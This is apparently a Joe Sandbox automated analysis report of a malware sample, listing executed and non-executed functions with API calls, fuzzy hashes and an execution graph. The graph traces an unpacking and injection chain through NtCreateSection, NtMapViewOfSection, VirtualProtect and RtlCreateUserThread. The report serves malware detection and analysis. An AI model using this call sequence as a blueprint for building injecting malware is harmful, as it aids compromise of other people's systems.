                                                • Source File: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: e6f0b986f79c47f2df78b5900a9022620743f9650b9358d5e1040a707868e860
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 0FD0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9080C770994046E5
                                                Function 004179CC Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 553 4179cc-4179e9 VirtualProtect
                                                APIs
                                                • VirtualProtect.KERNELBASE(00000040,?), ref: 004179E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: cba572e7f36d69fd621d82a340d50add2c2981a162f38f0641d48c01d346696d
                                                • Instruction ID: 55a1a841f0e4b6d1ed6018a3982979d51180b0568af62e4b39049d3d9c283280
                                                • Opcode Fuzzy Hash: cba572e7f36d69fd621d82a340d50add2c2981a162f38f0641d48c01d346696d
                                                • Instruction Fuzzy Hash: 00C08C71240109BFCB11CB81ED02E963B6DEB00204F408070B301A21F0D2B1AD119B2C
                                                Function 00401918 Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                                • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                                Function 00401924 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                                • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                                Function 0084974E Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0084979F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, Offset: 00846000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_846000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: 830b09e75a4824a331170b0f8d72f2d5daaef64d0642d60a96040909cdc11cfc
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: 18112B79A00208EFDB01DF98C985E99BBF5EF08351F058094F9889B362D771EA50DB80
                                                Function 00401941 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                                • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                                Function 00401954 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                                • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                                Function 0040194C Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                                • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F
                                                Function 004179AD Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LocalAlloc.KERNELBASE(00000000,00417DE5), ref: 004179B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: AllocLocal
                                                • String ID:
                                                • API String ID: 3494564517-0
                                                • Opcode ID: 602eef168cce5af4168a3244577f4c42e97a633be8229eb3d624b100d67a8e05
                                                • Instruction ID: 28fb293936c19f60ac03ee1532b02050230a0125afef6b60046f9351569db605
                                                • Opcode Fuzzy Hash: 602eef168cce5af4168a3244577f4c42e97a633be8229eb3d624b100d67a8e05
                                                • Instruction Fuzzy Hash: 8CB012702421008BCB908F50EE047003E60AB08302F438034E204812B0DB700C119B19

                                                Non-executed Functions

                                                Function 00417B5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00417B7B
                                                • Sleep.KERNEL32(00000000), ref: 00417BAA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterSleepUnhandled
                                                • String ID: -
                                                • API String ID: 2853467449-2547889144
                                                • Opcode ID: 20074c0cef41aae7a696b8d8c8af3f142c4ab85b5304221058387457ac50a666
                                                • Instruction ID: 1948eef14a266f42f26bae57ff7e43f9be2a9bb65bdfdabf3144fb3dff7a339f
                                                • Opcode Fuzzy Hash: 20074c0cef41aae7a696b8d8c8af3f142c4ab85b5304221058387457ac50a666
                                                • Instruction Fuzzy Hash: FB018F31408218BB8B11DF16EC858EE7B78EB89779B11C16DEC149A110C738AE42DF69
                                                Function 005B092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$GetProcAddress.$l
                                                • API String ID: 0-2784972518
                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction ID: c7459638c87ba179e0e09c491d186f62b7a5d7d100fc19adb48b8d00ba977644
                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction Fuzzy Hash: 9F3148B6900609DFDB10CF99C884AEEBBF9FF48324F24514AD841A7291D771FA45CBA4
                                                Function 0084936C Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, Offset: 00846000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_846000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction ID: 342c3576c7d73deeb3bbe25275f76471dcb13d68a7df1402823f36ae81189e2a
                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction Fuzzy Hash: AA117C72340104AFDB54DE59DCD1EA773EAFB8A324B298165ED04CB352D679EC02C760
                                                Function 005B0D90 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction ID: f95322f5e4a5fc3ce7f63fc076719aa5c883553e75ce8ba48214bc128ce0e291
                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction Fuzzy Hash: 6A01AD76A006048FDF21DF64C805BEB37E9FB86316F4945A9D90A9B2C2E774B9418B90
                                                Function 004179EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00429FD0), ref: 00417AB6
                                                • GetProcAddress.KERNEL32(00000000,0041C258), ref: 00417AF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID:
                                                • API String ID: 1646373207-3916222277
                                                • Opcode ID: 5319113c76b06308bf8541d769fd3ad63d1ecba144e285bf0cc76c909ccebf89
                                                • Instruction ID: 94e7802bf3509c972a7c99209e15cc35b9a207eae9f1f7606aeea9668401f719
                                                • Opcode Fuzzy Hash: 5319113c76b06308bf8541d769fd3ad63d1ecba144e285bf0cc76c909ccebf89
                                                • Instruction Fuzzy Hash: 68318F25A9C3C0DAE351C7E4BD45BE23B619B55B04F1580AAD984CB2F1D3FA0945C37E

                                                Execution Graph

                                                Execution Coverage:9%
                                                Dynamic/Decrypted Code Coverage:21.6%
                                                Signature Coverage:0%
                                                Total number of Nodes:134
                                                Total number of Limit Nodes:5
                                                execution_graph 3776 402e63 3778 402e67 3776->3778 3777 401918 8 API calls 3779 402f44 3777->3779 3778->3777 3778->3779 3818 401543 3819 401546 3818->3819 3820 4015e6 NtDuplicateObject 3819->3820 3828 401702 3819->3828 3821 401603 NtCreateSection 3820->3821 3820->3828 3822 401683 NtCreateSection 3821->3822 3823 401629 NtMapViewOfSection 3821->3823 3825 4016af 3822->3825 3822->3828 3823->3822 3824 40164c NtMapViewOfSection 3823->3824 3824->3822 3826 40166a 3824->3826 3827 4016b9 NtMapViewOfSection 3825->3827 3825->3828 3826->3822 3827->3828 3829 4016e0 NtMapViewOfSection 3827->3829 3829->3828 3878 401924 3879 401929 3878->3879 3880 40195e Sleep 3879->3880 3881 401979 3880->3881 3882 401538 7 API calls 3881->3882 3883 40198a 3881->3883 3882->3883 3666 5a003c 3667 5a0049 3666->3667 3679 5a0e0f SetErrorMode SetErrorMode 3667->3679 3672 5a0265 3673 5a02ce VirtualProtect 3672->3673 3675 5a030b 3673->3675 3674 5a0439 VirtualFree 3678 5a04be LoadLibraryA 3674->3678 3675->3674 3677 5a08c7 3678->3677 3680 5a0223 3679->3680 3681 5a0d90 3680->3681 3682 5a0dad 3681->3682 3683 5a0dbb GetPEB 3682->3683 3684 5a0238 VirtualAlloc 3682->3684 3683->3684 3684->3672 3754 469b4e 3757 469b5f 3754->3757 3758 469b6e 3757->3758 3761 46a2ff 3758->3761 3762 46a31a 3761->3762 3763 46a323 CreateToolhelp32Snapshot 3762->3763 3764 46a33f Module32First 3762->3764 3763->3762 3763->3764 3765 469b5e 3764->3765 3766 46a34e 3764->3766 3768 469fbe 3766->3768 3769 469fe9 3768->3769 3770 46a032 3769->3770 3771 469ffa VirtualAlloc 3769->3771 3770->3770 3771->3770 3772 402fe9 3773 403140 3772->3773 3774 403013 3772->3774 3774->3773 3775 4030ce RtlCreateUserThread NtTerminateProcess 3774->3775 3775->3773 3884 5a092b GetPEB 3885 5a0972 3884->3885 3685 417e97 3688 417c57 3685->3688 3687 417e9c 3689 417c74 3688->3689 3690 417cd1 6 API calls 3689->3690 3691 417d38 3689->3691 3693 417d1e 3690->3693 3692 417d3d GetCommMask GetLastError 3691->3692 3694 417d57 ZombifyActCtx 3692->3694 3695 417d5e GetConsoleAliasesW 3692->3695 3693->3691 3694->3695 3695->3692 3696 417d70 3695->3696 3697 417d7c OpenWaitableTimerW CreateWaitableTimerW 3696->3697 3705 417db1 3696->3705 3697->3705 3699 417de5 LoadLibraryA 3709 4179ea 3699->3709 3704 417e48 3714 417bd2 3704->3714 3708 4179ad LocalAlloc 3705->3708 3707 417e4d 3707->3687 3708->3699 3710 417a29 3709->3710 3711 417a35 GetModuleHandleW GetProcAddress 3710->3711 3712 417b0b 3710->3712 3711->3710 3713 4179cc VirtualProtect 3712->3713 3713->3704 3715 417c1d 3714->3715 3716 417bfe ReadEventLogW 3714->3716 3723 417b30 3715->3723 3716->3715 3719 417c30 FreeEnvironmentStringsA FindFirstVolumeA 3720 417c3f 3719->3720 3726 417b5e 3720->3726 3724 417b41 OpenJobObjectA LoadLibraryW 3723->3724 3725 417b55 3723->3725 3724->3725 3725->3719 3725->3720 3727 417b76 SetUnhandledExceptionFilter 3726->3727 3730 417b81 3726->3730 3727->3730 3728 417bb6 3728->3707 3730->3728 3731 417ba9 Sleep 3730->3731 3731->3730 3796 401496 3797 401447 3796->3797 3797->3796 3798 4015e6 NtDuplicateObject 3797->3798 3807 40152f 3797->3807 3799 401603 NtCreateSection 3798->3799 3798->3807 3800 401683 NtCreateSection 3799->3800 3801 401629 NtMapViewOfSection 3799->3801 3803 4016af 3800->3803 3800->3807 3801->3800 3802 40164c NtMapViewOfSection 3801->3802 3802->3800 3804 40166a 3802->3804 3805 4016b9 NtMapViewOfSection 3803->3805 3803->3807 3804->3800 3806 4016e0 NtMapViewOfSection 3805->3806 3805->3807 3806->3807 3732 402eb7 3734 402eb8 3732->3734 3733 402f44 3734->3733 3736 401918 3734->3736 3737 401929 3736->3737 3738 40195e Sleep 3737->3738 3739 401979 3738->3739 3741 40198a 3739->3741 3742 401538 3739->3742 3741->3733 3743 401539 3742->3743 3744 4015e6 NtDuplicateObject 3743->3744 3751 401702 3743->3751 3745 401603 NtCreateSection 3744->3745 3744->3751 3746 401683 NtCreateSection 3745->3746 3747 401629 NtMapViewOfSection 3745->3747 3749 4016af 3746->3749 3746->3751 3747->3746 3748 40164c NtMapViewOfSection 3747->3748 3748->3746 3750 40166a 3748->3750 3749->3751 3752 4016b9 NtMapViewOfSection 3749->3752 3750->3746 3751->3741 3752->3751 3753 4016e0 NtMapViewOfSection 3752->3753 3753->3751 3780 4014de 3781 401447 3780->3781 3782 4015e6 NtDuplicateObject 3781->3782 3789 40152f 3781->3789 3783 401603 NtCreateSection 3782->3783 3782->3789 3784 401683 NtCreateSection 3783->3784 3785 401629 NtMapViewOfSection 3783->3785 3787 4016af 3784->3787 3784->3789 3785->3784 3786 40164c NtMapViewOfSection 3785->3786 3786->3784 3788 40166a 3786->3788 3787->3789 3790 4016b9 NtMapViewOfSection 3787->3790 3788->3784 3790->3789 3791 4016e0 NtMapViewOfSection 3790->3791 3791->3789

                                                Executed Functions

                                                Function 00401496 Relevance: 10.7, APIs: 7, Instructions: 247nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 138 401496-4014a5 139 4014a7 138->139 140 40151b-40152d 138->140 142 4014a9-4014b5 139->142 143 4014cf 139->143 149 4014ba 140->149 152 40152f-401535 140->152 146 401471-401472 142->146 147 4014b7-4014b8 142->147 144 4014d6 143->144 144->144 150 4014d8 144->150 151 401473-401484 146->151 148 401449 147->148 147->149 156 40147b-40148e call 4011b7 148->156 157 40144b 148->157 153 401447-401456 149->153 154 4014bc-4014c3 149->154 150->140 151->156 162 40144c-401470 153->162 158 4014c5-4014c8 154->158 159 401539-401567 154->159 156->138 157->162 158->143 172 401558-401563 159->172 173 40156a-401590 call 4011b7 159->173 162->151 172->173 180 401592 173->180 181 401595-40159a 173->181 180->181 183 4015a0-4015b1 181->183 184 4018b8-4018c0 181->184 188 4018b6-4018c5 183->188 189 4015b7-4015e0 183->189 184->181 191 4018da 188->191 192 4018cb-4018d6 188->192 189->188 198 4015e6-4015fd NtDuplicateObject 189->198 191->192 194 4018dd-401915 call 4011b7 191->194 192->194 198->188 200 401603-401627 NtCreateSection 198->200 201 401683-4016a9 NtCreateSection 200->201 202 401629-40164a NtMapViewOfSection 200->202 201->188 206 4016af-4016b3 201->206 202->201 204 40164c-401668 NtMapViewOfSection 202->204 204->201 207 40166a-401680 204->207 206->188 209 4016b9-4016da NtMapViewOfSection 206->209 207->201 209->188 211 4016e0-4016fc NtMapViewOfSection 209->211 211->188 214 401702 call 401707 211->214
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0
                                                • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                                • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69
                                                Function 00401538 Relevance: 10.7, APIs: 7, Instructions: 207nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 216 401538-401567 222 401558-401563 216->222 223 40156a-401590 call 4011b7 216->223 222->223 230 401592 223->230 231 401595-40159a 223->231 230->231 233 4015a0-4015b1 231->233 234 4018b8-4018c0 231->234 238 4018b6-4018c5 233->238 239 4015b7-4015e0 233->239 234->231 241 4018da 238->241 242 4018cb-4018d6 238->242 239->238 248 4015e6-4015fd NtDuplicateObject 239->248 241->242 244 4018dd-401915 call 4011b7 241->244 242->244 248->238 250 401603-401627 NtCreateSection 248->250 251 401683-4016a9 NtCreateSection 250->251 252 401629-40164a NtMapViewOfSection 250->252 251->238 256 4016af-4016b3 251->256 252->251 254 40164c-401668 NtMapViewOfSection 252->254 254->251 257 40166a-401680 254->257 256->238 259 4016b9-4016da NtMapViewOfSection 256->259 257->251 259->238 261 4016e0-4016fc NtMapViewOfSection 259->261 261->238 264 401702 call 401707 261->264
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                                • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65
                                                Function 004014DE Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 266 4014de-4014ed 267 401563 266->267 268 4014ef 266->268 271 40156a-401590 call 4011b7 267->271 269 401551-401552 268->269 270 4014f1-401502 268->270 269->267 272 401504-401516 270->272 273 40151d-40152d 270->273 288 401592 271->288 289 401595-40159a 271->289 275 40151b-40151c 272->275 278 4014ba 273->278 279 40152f-401535 273->279 275->273 281 401447-401456 278->281 282 4014bc-4014c3 278->282 290 40144c-401470 281->290 285 4014c5-4014c8 282->285 286 401539-401567 282->286 291 4014cf 285->291 286->271 305 401558-401560 286->305 288->289 301 4015a0-4015b1 289->301 302 4018b8-4018c0 289->302 304 401473-401484 290->304 294 4014d6 291->294 294->294 298 4014d8 294->298 298->275 312 4018b6-4018c5 301->312 313 4015b7-4015e0 301->313 302->289 310 40147b-4014a5 call 4011b7 304->310 305->267 310->275 322 4014a7 310->322 316 4018da 312->316 317 4018cb-4018d6 312->317 313->312 327 4015e6-4015fd NtDuplicateObject 313->327 316->317 320 4018dd-401915 call 4011b7 316->320 317->320 322->291 326 4014a9-4014b5 322->326 329 401471-401472 326->329 330 4014b7-4014b8 326->330 327->312 331 401603-401627 NtCreateSection 327->331 329->304 330->278 332 401449 330->332 333 401683-4016a9 NtCreateSection 331->333 334 401629-40164a NtMapViewOfSection 331->334 332->310 339 40144b 332->339 333->312 338 4016af-4016b3 333->338 334->333 336 40164c-401668 NtMapViewOfSection 334->336 336->333 340 40166a-401680 336->340 338->312 342 4016b9-4016da NtMapViewOfSection 338->342 339->290 340->333 342->312 344 4016e0-4016fc NtMapViewOfSection 342->344 344->312 347 401702 call 401707 344->347
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0
